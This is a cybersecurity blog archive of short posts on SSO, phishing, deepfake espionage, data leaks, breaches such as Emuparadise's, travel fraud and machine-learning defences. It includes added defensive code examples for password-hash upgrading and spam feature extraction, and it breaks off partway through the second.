Category Archives: Cybersecurity

SSO: How It Improves Cybersecurity and User Experience

The launch of a single sign-on (SSO) project in an organization is often driven by user dissatisfaction with current IT systems and the need to remember several user IDs and passwords to access daily applications.

In the absence of an application designed to store credentials and enter them automatically on the user's behalf, many users tend to ignore security policies. They choose weak passwords (short, simple, predictable), or share them with trusted colleagues, even outside the office.

A good SSO serves both needs: users benefit from simple and fast authentication to all the applications they are authorized to use, and the organization can enforce a comprehensive security policy that covers all IT systems. SSO strengthens authentication and allows access to all controlled applications to be tracked. In addition, CFOs can significantly reduce the cost of managing and resetting user passwords.

How single sign-on (SSO) increases IT security

SSO is becoming a best practice in IT security. It reduces the cognitive burden on IT admins, allows them to concentrate on IT management, and improves operational workflows. As part of a cybersecurity strategy, SSO is a strategic investment in the IT security of an organization, for the following reasons:

SSO increases security by replacing conventional passwords

Passwords are the main cause of most computer security breaches because they can be lost, shared, stolen, or easily forgotten. When a user password is leaked, the entire company perimeter can be exposed. With an SSO solution, companies can effectively lock down their human perimeter and eliminate most of the passwords their employees hold. By replacing passwords with safer, faster, and stronger user authentication methods, such as badge-based login, SSO can significantly improve corporate cybersecurity efforts by eliminating many of the weaknesses of legacy passwords.

SSO improves security by reducing cognitive stress

Passwords require users to keep splitting their attention between their computer systems and their daily activities. By forcing users to interrupt their work to type long alphanumeric strings into a dialog box, passwords increase employee cognitive load. This cognitive tension drives professionals to improvise insecure password workarounds to reduce their frustration. Such workarounds include writing passwords on paper, using generic credentials, or sharing accounts. Although these workarounds are easier to use and do not frustrate users, they are a nightmare for IT security. Single sign-on (SSO) removes this cognitive stress and allows users to quickly and easily access their sessions without having to type long and complicated passwords multiple times.

SSO increases security by reducing hacking

No matter how clever a user is, they can be manipulated into revealing their passwords to hackers through clever social-engineering tactics. Phishing techniques are so sophisticated that even the most experienced users can succumb to them. Users, tired of changing passwords, recovering them, and repeatedly entering complex passwords, naturally become numb to password requirements. If a hacker presents a fake dialog box or a fake password reset email, at least one user will fall into the trap. By replacing manual passwords with a secure and centralized single sign-on system, users are automatically protected from even the most sophisticated password-poaching methods.

SSO improves security by freeing IT resources

An SSO solution is far easier to manage than a password-heavy IT system. Without user passwords that are frequently changed, lost, or forgotten, IT departments are no longer bogged down with mundane password reset calls and related maintenance requests. With SSO, IT departments can refocus their time and energy on more strategic security initiatives while the SSO solution centralizes password resets and handles all the necessary reporting and auditing.

An effective SSO solution improves an organization’s security by eradicating the root security problem: the password. By replacing passwords, SSO reduces users’ load, improves workflows, protects organizations from security breaches, and frees IT resources to work on more strategic security projects. For each of these reasons, implementing an SSO solution is a sound cybersecurity decision for businesses.


The post SSO: How It Improves Cybersecurity and User Experience appeared first on .

Why phishing education has never been more critical to your business

Our cyber defenses are becoming stronger and stronger every year. Even the smallest companies can now deploy advanced anti-malware and intrusion detection tools that were, until recently, only within the reach of larger enterprises. Today, sandboxed behavior detection and machine-learning/artificial-intelligence powered security services make it easy for organizations of any size to crack down on even the most sophisticated malware.

Users are still the weakest link

But as our network perimeter and endpoint security … More

The post Why phishing education has never been more critical to your business appeared first on Help Net Security.

Deepfake LinkedIn Profile Shows Espionage Threat

A deepfake account with possible connections to foreign espionage activity has been identified on LinkedIn.

“Katie Jones” purported to be a senior researcher for the Center for Strategic and International Studies (CSIS). Her well-connected profile on the professional social media site seemed legitimate, with connections that included a deputy assistant secretary of state and economist Paul Winfree, currently being considered for a seat on the Federal Reserve.

An investigation conducted by the Associated Press found that Jones doesn’t exist, and that her profile photo–depicting an attractive woman in her 30s–was a deepfake created using generative adversarial networks, or GANs, AI-driven software that can produce believable images of fictitious people.

“For a while now people have been worrying about the threat of ‘deepfakes’, AI-generated personas that are indistinguishable, or almost indistinguishable, from real live humans,” tweeted AP reporter Raphael Satter, who first reported on the story.

“I conducted about 40 interviews, speaking to all but a dozen of Katie’s connections. Overwhelmingly, her connections told me they accepted whoever asked to their network,” Satter wrote in another tweet.

LinkedIn has been called a “spy’s playground” in reference to the site’s functionality, which makes accepting connections from strangers a matter of routine by suggesting that doing so might benefit one's own career. The German domestic intelligence agency, the Bundesamt für Verfassungsschutz (BfV), warned of the potential danger of the platform and how “[i]nformation about habits, hobbies and even political interests can be generated with only a few clicks.”

“Instead of dispatching spies to some parking garage in the U.S. to recruit a target, it’s more efficient to sit behind a computer in Shanghai and send out friend requests to 30,000 targets,” said William Evanina, director of the U.S. National Counterintelligence and Security Center.

Digital imaging experts warn LinkedIn users to look for telltale signs of GAN-generated profiles, such as those in the below photo. Several more examples can be found on the website thispersondoesnotexist.com, which randomly generates GAN photos.

AP Deepfake photo
Source: AP Photo

Read the original AP report here.

The post Deepfake LinkedIn Profile Shows Espionage Threat appeared first on Adam Levin.

What does runtime container security really mean?

End-to-end protection for containers in production is required to avoid the steep operational and reputational costs of data breaches. As news of container attacks and fresh vulnerabilities continues to prove, short cuts (or incomplete security strategies) aren’t going to work. Runtime container security means vetting all activities within the container application environment, from analysis of container and host activity to monitoring the protocols and payloads of network connections. Containers running in production environments actively fulfill … More

The post What does runtime container security really mean? appeared first on Help Net Security.

Human error still the cause of many data breaches

With the incidence of reported data breaches on the rise, more than half of all C-suite executives (C-Suites) (53%) and nearly three in 10 Small Business Owners (SBOs) (28%) who suffered a breach reveal that human error or accidental loss by an external vendor/source was the cause of the data breach, according to a Shred-it survey conducted by Ipsos. When assessing additional causes of data breaches, the report found that nearly half of all C-Suites … More

The post Human error still the cause of many data breaches appeared first on Help Net Security.

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

Organizations are advancing their efforts, investing in OT cybersecurity programs

ICS cybersecurity threats remain high and present evolving challenges, a new SANS report reveals. However, since the last SANS OT/ICS report released in 2017, a growing majority of organizations have significantly matured their security postures over the last two years and are adopting strategies that address OT/IT convergence. “The findings in this latest SANS report make it clear that 2019 is the year for ICS cybersecurity,” said Nozomi Networks CEO Edgard Capdevielle. “We see the … More

The post Organizations are advancing their efforts, investing in OT cybersecurity programs appeared first on Help Net Security.

The gaming community is a rising target for credential stuffing attacks

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites within the 17-month period analyzed in the report (November 2017 – March 2019) by Akamai.

55 billion credential stuffing attacks

This puts the gaming community among the fastest rising targets for credential stuffing attacks and one of the most lucrative targets for criminals looking to make a quick profit. During the same time period, Akamai saw a total … More

The post The gaming community is a rising target for credential stuffing attacks appeared first on Help Net Security.

GDPR implementation lessons can help with CCPA compliance

The ever increasing number of data breaches has made consumers more aware of how their data is being used and has emphasized the importance of keeping personal data private, says Sovan Bin, CEO and founder of cloud data management firm Odaseva. “In terms of the general public, the California Consumer Privacy Act (CCPA) is a wake-up call for consumers to know and understand their data privacy rights. They should feel free to exercise these rights … More

The post GDPR implementation lessons can help with CCPA compliance appeared first on Help Net Security.

CISO do’s and don’ts for board reporting

Security is no longer just a job for IT – it impacts all areas of a business, from brand perception to the bottom line. As a result, CISOs are increasingly being asked to deliver cybersecurity reports to their boards, including information on global trends, security performance, security strategy, and security spend. In an ideal world, this increase in board visibility would foster a new collaborative relationship between security leaders and their executive stakeholders; one that … More

The post CISO do’s and don’ts for board reporting appeared first on Help Net Security.

Healthcare executives need to make cybersecurity a business priority

Risks associated with Internet of Things, medical devices, third-party vendors, and program management are top of mind for healthcare executives, according to a CynergisTek’s survey. The survey of approximately 60 C-level healthcare executives revealed the greatest perceived threats and current challenges these organizations are facing in cybersecurity and privacy. The data also pinpointed some of the barriers or disconnects within the organization to solve these issues, like executive leadership buy-in. Most notably: 40% responded that … More

The post Healthcare executives need to make cybersecurity a business priority appeared first on Help Net Security.

Code signing keys and certificates are crucial security assets, are you protecting them?

Only 28 percent of organizations consistently enforce a defined security process for code signing certificates, a Venafi study of over 320 security professionals in the U.S., Canada and Europe reveals. “When the code signing keys and certificates that serve as machine identities fall into the hands of attackers, they can inflict enormous damage,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi. “Secure code signing processes enable apps, updates, and open … More

The post Code signing keys and certificates are crucial security assets, are you protecting them? appeared first on Help Net Security.

Personal security and national security concerns are back on the rise

More than one in five (22%) Americans say they have cancelled plans or considered cancelling plans to attend large-scale public events due to concerns about physical attacks and the safety of their data, according to the new 2019 Unisys Security Index.

Safety at events

The survey also found that a high majority (83%) of Americans are concerned about a criminal attack causing physical harm at large-scale events such as sporting events or concert festivals – … More

The post Personal security and national security concerns are back on the rise appeared first on Help Net Security.

The Tax Paying Hacker: A Modern Phenomenon

In a dark room lit only by the light from four computer monitors sits a hacker named Hector (not his real name). You can hear the faint pulse of an EDM track coming from his headphones as Hector taps away on his computer’s keyboard. The above description could serve as the setting for a hacker […]… Read More

The post The Tax Paying Hacker: A Modern Phenomenon appeared first on The State of Security.

You’re Probably Worse Than You Think at Cybersecurity. You’re Not Alone.

If you’re like most people, you feel confident and well-informed about online security, and if you’re like most people you have absolutely no reason to feel that way.

That was the conclusion of a new survey from Harris Poll and Google, which found that 55% of Americans above the age of 16 graded themselves as an A or B when it comes to online safety, but only 23% could identify a link with “https” as being more secure than “http,” 70% misidentified a secure URL, and a whopping 97% got at least one answer wrong on a basic six-question security test.

But don’t let it get you down–many major companies aren’t very good at online security, either.

First American Financial and Google’s Years-Long Blunder

Take, for example, First American Financial Corp. The company stored customer documents and records pertaining to mortgage deals going back 16 years in a way that was openly accessible to anyone with a web browser: zero authentication or encryption required. All one needed was a guessable URL to view documents related to mortgage deals, including bank account numbers, tax records, Social Security numbers, and scans of driver’s licenses. There were scads of records involved, almost 900 million of them.

As Brian Krebs noted, the number of people with access “would potentially include anyone who’s ever been sent a document link via email by First American.” By extension, it would also include anyone with access to an email fitting that description.

While First American is a Fortune 500 company, it has never demonstrated any interest in being a cybersecurity-forward company. That said, even companies that take cyber security seriously often get it wrong.

Take Google, for instance. The search giant came clean about a similar gaffe earlier this month, revealing that passwords associated with the accounts of an unspecified number of G Suite users had been stored in an unencrypted format on their servers for 14 years.

“To be clear, these passwords remained in our secure encrypted infrastructure,” the company announced in a blog. Considering that the passwords were supposed to be stored in an encrypted format, reassurances about infrastructure seem a bit hollow.

And Many, Many Others

Google and First American are hardly alone. Facebook’s seemingly unending parade of major privacy accidents, mistakes, and gaffes is mind-boggling and too long to list here.

This month alone 49 million Instagram users learned their personal information had been leaked, and 5 million customers of Canada’s fourth largest cellular provider also were potentially exposed. The FEMA leak of 2.3 million disaster victims as well as Meditlab’s accidental exposure of six million medical records in the form of digitized faxes are two other recent indications from news feeds that we are all living in a state of cyber insecurity.

These news items are noteworthy not only because of the danger they pose to the people whose personal information is now almost certainly in the wrong hands. What matters here is that none of them are data breaches. They are all data leaks.

It’s easy to confuse the two, but while a data breach is a failure to keep a hacker or cyber-attacker out of your data, a data leak is a failure to protect it in the first place. It’s the difference between someone breaking into a bank vault and having an employee not bothering to shut and bolt the vault door. And much like data breaches, leaks only seem to be getting more common.

This is where corporate culture comes into play.

If a majority of people have an unrealistically high opinion of their own security savviness, companies need to take that into account. Lax attitudes and faulty assumptions are rife in the workplace. That Google traversed 14 years as a going concern without checking a basic security feature in one of its flagship services is resounding proof of this troubling fact.

What can companies do?

As the old Peter Drucker saying goes, “Culture eats strategy for breakfast.” While it’s extremely difficult, especially for cybersecurity teams, to change pervasive attitudes in a company, that’s the job at hand.

A few basic practices can help get companies headed in the right direction, and cut down on some of the more easily preventable data leaks:

  • Ask simple questions and encourage others to do the same: Reliance on sophisticated tools for determining cyber risk is an easy (and bad) habit to fall into. Tools should never trump basic questions like, “Is that data encrypted?”
  • Map and inventory your data: Data is an important commodity to businesses and hackers alike. Losing track of customer data or information only opens the door for it to be left accidentally unprotected on a server or a network drive. Any time data is collected, have a policy for documenting where it is, how it’s stored, and who has access to it.
  • Review your practices: Most IT departments are overworked and spread thin. Running from one crisis to the next means less time to check and double-check for any security holes or basic errors in how security is handled.

A sloppy attitude toward data security is ultimately a safety issue. While people affected by a data leak may not be in immediate physical danger, there is potential for lasting harm to customers and a company’s reputation. Much like any other workplace safety issue, a set of rigorous safeguards and workplace training are vital to avoid carelessness.


The post You’re Probably Worse Than You Think at Cybersecurity. You’re Not Alone. appeared first on Adam Levin.

Harnessing Machine Learning and Automation against Advanced Threats

Estimated reading time: 2 minutes

With the specter of advanced cybersecurity threats always on the horizon, enterprises are seriously considering harnessing the power of machine learning and automation to fight against these threats. For good reason too – a cybersecurity survey suggested that organizations with an extensive use of automation rated themselves as much more likely to prevent, detect, respond and contain a cyber attack.

These concepts are becoming increasingly important in today’s era of fast-growing cyber threats, but what do they mean exactly? Machine learning basically refers to computers learning from data instead of receiving explicit programming. Through such machine learning algorithms, computers are fed huge datasets and parse through them to recognize patterns or correlations through extended data analysis.

The importance of machine learning

Machine learning is becoming a common feature in more and more industries, and cybersecurity has not lagged behind. An ABI Research report estimated that machine learning in cybersecurity will boost big data, intelligence and analytics spending to $96 billion by 2021. It is quite clear why there is such extended growth: machine learning allows businesses to respond better and bolster their own defenses when it comes to the big, bad world of cyber threats. Security companies are rejigging the solutions they offer in tune with this trend. They are moving from signature-based systems to layered solutions where machine learning systems interpret data to better detect malware.

Some of these advantages are:

Making Sense of Data – The amount of data that can be collected for cybersecurity is humongous. While the sheer volume of data may be too much for humans alone to analyze, this is where machine learning can step in. By analyzing and processing large amounts of data, it may be possible to find patterns or categories of behavior which can be used to fight advanced cybersecurity threats.

Using Automation for Better Protection – Different threats can have different attack points for an enterprise and even one threat may attack different touchpoints in different ways. This is where automation can do a much more effective job. By understanding the predicted behavior and touchpoints of a potential attack, automation can create better protection measures across touchpoints suited to exactly the type of predicted attack.

Using A Cluster-based approach for better detection – Quick Heal already uses machine learning to solve various cybersecurity problems using a cluster-based approach, illustrated in this whitepaper. Samples are clustered through machine learning, with each cluster containing samples similar to each other. These generated clusters are huge, and processing them happens through machine learning, where they are aggregated, analyzed and automated. The data is then labeled and processed to generate models. After scrutiny against numerous factors, including time, size and quality, the models are qualified for endpoint deployment.

Machine learning and automation will be great weapons in the fight against advanced cybersecurity threats, but they also need to be backed up with a combination of data science and human expertise.


The post Harnessing Machine Learning and Automation against Advanced Threats appeared first on Seqrite Blog.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

Together with HomeAway, we here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Oftentimes, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

First framework to score the agility of cyber attackers and defenders

To help train government and industry organizations on how to prevent cyberattacks, as part of a research project for the U.S. Army, scientists at The University of Texas at San Antonio, developed the first framework to score the agility of cyber attackers and defenders. “The DOD and U.S. Army recognize that the cyber domain is as important a battlefront as ground, air and sea,” said Dr. Purush Iyer, division chief, network sciences at Army Research … More

The post First framework to score the agility of cyber attackers and defenders appeared first on Help Net Security.

Why Is Cybersecurity Recruitment On The Rise?

Cybersecurity is a field in demand. Growing cyber-attacks, the demand for secure data, and other concerns mean that businesses need professionals to protect their information.

If you’re considering a career change in 2019, you may want to take a look at the growing cybersecurity market, which is expected to keep growing through 2019–2020.

This is an area where the good guys, the cybersecurity professionals, are dealing with the bad guys, cybercriminals and hackers. Assuming you want to be a good guy, a career here can mean a six-figure salary, job security, and upward mobility potential.

A job in the field of cybersecurity is the ideal solution for anyone who wants to work in the field of technology at the moment. Data compiled by the recruitment website shows an increase in demand compared to 2018.

The growing popularity of such jobs should not be a big surprise considering the current climate. The frequency and severity of data breaches are increasing, with attacks against well-known companies regularly in the news. And with the implementation of increasingly stringent privacy laws, such as the GDPR, companies have never focused more on protecting their networks and the valuable information that flows through them.

But what do these jobs really mean? Instead of any detail on the skills currently required, we see only vague and general titles: “Computer Security Specialist, Computer Security Engineer, and Security Consultant”. It would be difficult to be less precise. However, what matters most to the security of an organization is the experience, knowledge, and specialized skills behind those titles. Unfortunately, the human resources teams, business leaders, and board members who decide who to hire often do not understand the nuances of what it really means to be on the front line against cyber threats.

Be Specific

Threat actors use a variety of techniques to exploit both technological and human vulnerabilities as part of their mission of stealing valuable information, extorting a ransom from businesses, or causing damage.

In 2018, nearly two-thirds of businesses were victims of a zero-day attack, while the number of phishing attacks increased by nearly 300%. DNS is still a target because attackers exploit this remarkably unprotected protocol to exfiltrate confidential information and to mount DDoS attacks. Web applications are vulnerable to SQL injection and database attacks. And the users themselves are considered the weakest point of any computer network, sometimes deliberately, but usually by accident.

The problem is that there is no single kind of security expert, just as there is no single attack vector. A business needs to know the nuances in order to protect its attack surface effectively. It is important to understand that an expert in application security may have less knowledge of digital forensics and reverse engineering than someone with a general security background.

Related Resources:

Top 3 Cybersecurity Measures: Skepticism, Awareness and Training

Cybersecurity Prediction for 2019

The post Why Cybersecurity Recruitment On The Rise? appeared first on .

3.4 billion fake emails are sent around the world every day

At least 3.4 billion fake emails are sent around the world every day — with most industries remaining vulnerable to spear-phishing and “spoofing” cyberattacks simply because they’re not implementing industry-standard authentication protocols, according to a Valimail report. The research report also found that the vast majority of suspicious emails emanate from U.S.-based sources. It’s not all bad news, however. Ongoing research also indicates that many industries are making progress in the fight against impersonation, some …

The post 3.4 billion fake emails are sent around the world every day appeared first on Help Net Security.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine DeHashed shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting adds unique, random data to each user’s password before it is hashed. However, MD5 is fast to compute and is no longer considered adequate for protecting passwords, so the leak is cause for cybersecurity concern.
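As an added illustration (not Emuparadise’s code), the snippet below contrasts the weak salted MD5 scheme with a deliberately slow KDF and shows how a site can upgrade legacy records transparently on a user’s next successful login. The user table, the salts and the PBKDF2 parameters are constructed assumptions.

```python
"""Added example (not Emuparadise's code): why a salted MD5 store is weak, and
how to upgrade such records to a slow, salted KDF on the user's next login.
The in-memory user table is constructed; PBKDF2-HMAC-SHA256 is an assumed
replacement scheme, not what the site actually used."""
import hashlib
import hmac
import os

# Work factor for the upgraded scheme (constructed value); tune it so that one
# verification costs tens of milliseconds on the production hardware.
PBKDF2_ITERATIONS = 600_000


def legacy_md5_hash(password: str, salt: bytes) -> str:
    """The weak legacy scheme: a single fast MD5 pass over salt||password.
    The salt defeats precomputed tables, but a GPU still tests billions of
    guesses per second, so weak passwords fall quickly."""
    return hashlib.md5(salt + password.encode()).hexdigest()


def legacy_record(password: str) -> str:
    """Store a password the legacy way: 'md5$<salt hex>$<digest hex>'."""
    salt = os.urandom(8)
    return f"md5${salt.hex()}${legacy_md5_hash(password, salt)}"


def pbkdf2_record(password: str) -> str:
    """Modern scheme: 16-byte random salt and a deliberately slow KDF."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(record: str, password: str) -> bool:
    """Verify a password against either record format using a constant-time compare."""
    scheme, rest = record.split("$", 1)
    if scheme == "md5":
        salt_hex, digest = rest.split("$")
        expected = legacy_md5_hash(password, bytes.fromhex(salt_hex))
        return hmac.compare_digest(expected, digest)
    if scheme == "pbkdf2_sha256":
        iterations, salt_hex, digest = rest.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(dk.hex(), digest)
    raise ValueError(f"unknown hash scheme {scheme!r}")


def login(users: dict, username: str, password: str) -> bool:
    """Authenticate and, if the stored record is still MD5, rehash it with
    PBKDF2 now, while the plaintext is briefly available."""
    record = users.get(username)
    if record is None or not verify(record, password):
        return False
    if record.startswith("md5$"):
        users[username] = pbkdf2_record(password)
    return True


def needs_upgrade(users: dict) -> list:
    """Accounts still on the legacy scheme; these are the ones to force-reset."""
    return sorted(name for name, rec in users.items() if rec.startswith("md5$"))
```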

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

YouTube Attacks to Watch Out For in 2019

YouTube, the world’s top provider of streaming multimedia content, keeps reaching new heights in terms of its popularity. Nearly two billion monthly users and five billion videos watched every single day – these impressive statistics speak for themselves, and the numbers are steadily growing year over year. Everybody loves YouTube and so do cybercriminals, only […]

The post YouTube Attacks to Watch Out For in 2019 appeared first on The State of Security.

How Machine Learning Helps Improve Cybersecurity

Cyberattacks have increased on an unprecedented scale, and the reasons are many. The main one, obviously, is our increasing dependence on computing devices (computers, smartphones etc.) and the internet for our day-to-day needs. Today’s world is one of quickly evolving technologies, and interconnectedness is one of the salient features of the technology we depend on. This, together with our habit of using unsecured networks and devices (public Wi-Fi, for example) for convenience’s sake, has caused an unprecedented increase in cyberattacks.

Of the various technologies that we use today to prevent cyberattacks and to ensure cybersecurity, machine learning deserves special mention. Machine learning definitely is a great technology that offers some highly efficient security solutions and thus helps prevent cybercrime.

Today, we discuss how machine learning helps improve and ensure cybersecurity.

Today, we have many machine learning apps that are used for enhancing cybersecurity. There are many such apps that help monitor networks for cybersecurity issues and to detect vulnerabilities or breaches. Such apps also help enterprises generate automated responses whenever there are cyberattacks. Let’s take a look at how these apps work and how they can be used for security purposes like spam detection, risk detection, detection of phishing attacks and malware detection.

Machine learning apps and spam detection

Machine learning apps play a very important role in spam detection. Various reports suggest that more than half of all email today is spam, so there is a growing need for spam filters that can effectively block it from reaching inboxes and causing trouble. Malware-laden phishing emails are among this spam. Today we have robust, cost-effective machine learning-powered spam filters that apply different sets of rules to identify and filter spam. Because these filters are far more flexible and efficient than other knowledge-based methods, they are better suited to combating cybercrime in today’s context. Such tools rely on adaptive algorithms trained on pre-classified datasets, classifying emails as spam or not spam based on many features, including the hyperlinks, the attachments, the word frequency count, the HTML tags, the length of the email, the sending IP address etc.

Machine learning apps and risk detection

Risk detection and timely response to potential risks are part of the very foundations of cybersecurity. Machine learning apps used for cybersecurity help monitor, analyze and respond to all kinds of threats and attacks on networks, software, applications and hardware. It has to be remembered that infiltration or infection of a network often happens long before detection; attackers can infiltrate systems or networks and lie dormant for many months before launching an attack. This is where machine learning comes in handy. It plays a key role in identifying and detecting cybercrime, in protecting networks and their components from all kinds of risk, and in response and recovery as well.

Detection of phishing attacks using machine learning

Most research data show that cybercriminals are increasingly using phishing techniques to launch cyberattacks. In fact, phishing techniques are the most popular among all techniques used to launch attacks. All internet users get phishing emails delivered to their inboxes on a regular basis and hence detection of phishing attacks is important as regards preventing cybercrime. Phishing attacks could lead to the breach of sensitive personal data including credit card data, banking data, login credentials, intellectual property etc. Phishing attacks are widely used for launching ransomware strikes as well. There are different kinds of phishing attacks and hence anti-phishing methods basically fall under three main groups, namely detective methods, preventive methods and corrective methods. Machine learning algorithms are widely used to help detect phishing emails or websites. This is done by monitoring and analyzing data and related features like the number of links, IP addresses, IP-based URLs, JavaScript presence etc.
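The two sections above (spam filtering and phishing detection) both describe classifying email by features such as link count, IP-based URLs, HTML tags, script presence, attachments, message length and word presence. The following example, added here and not part of the original post, extracts exactly those features from real MIME messages and scores them with a Bernoulli naive Bayes model; the six-message training corpus, keyword list and thresholds are constructed assumptions.

```python
"""Added example, not code from the original post: the email features the text
lists (links, IP-based URLs, HTML tags, script presence, attachments, length,
keyword presence) extracted from MIME messages and scored by a Bernoulli naive
Bayes model. The corpus is tiny and constructed; a real filter trains on
thousands of labelled messages."""
import math
import re
from collections import Counter
from email import message_from_string, policy
from email.message import EmailMessage

URL_RE = re.compile(r"""https?://([^/\s"'>]+)""", re.IGNORECASE)
IP_HOST_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
TAG_RE = re.compile(r"<[a-zA-Z][^>]*>")
KEYWORDS = ("verify", "urgent", "password", "meeting")  # constructed list


def build_message(body, html=False, attach=None):
    """Construct a raw RFC 5322 message (used to build the sample corpus)."""
    msg = EmailMessage()
    msg["From"], msg["To"] = "sender@example.test", "user@example.test"
    msg.set_content(body, subtype="html" if html else "plain")
    if attach:
        msg.add_attachment(b"constructed bytes", maintype="application",
                           subtype="octet-stream", filename=attach)
    return msg.as_string()


def extract_features(raw):
    """Binary features from a raw message, walking every MIME part."""
    msg = message_from_string(raw, policy=policy.default)
    body, attachment = "", False
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            attachment = True
        elif part.get_content_type() in ("text/plain", "text/html"):
            body += part.get_content()
    hosts = URL_RE.findall(body)
    words = {w.lower() for w in re.findall(r"[A-Za-z]+", body)}
    feats = {
        "many_links": len(hosts) >= 2,
        "ip_url": any(IP_HOST_RE.match(h) for h in hosts),
        "html_tags": bool(TAG_RE.search(body)),
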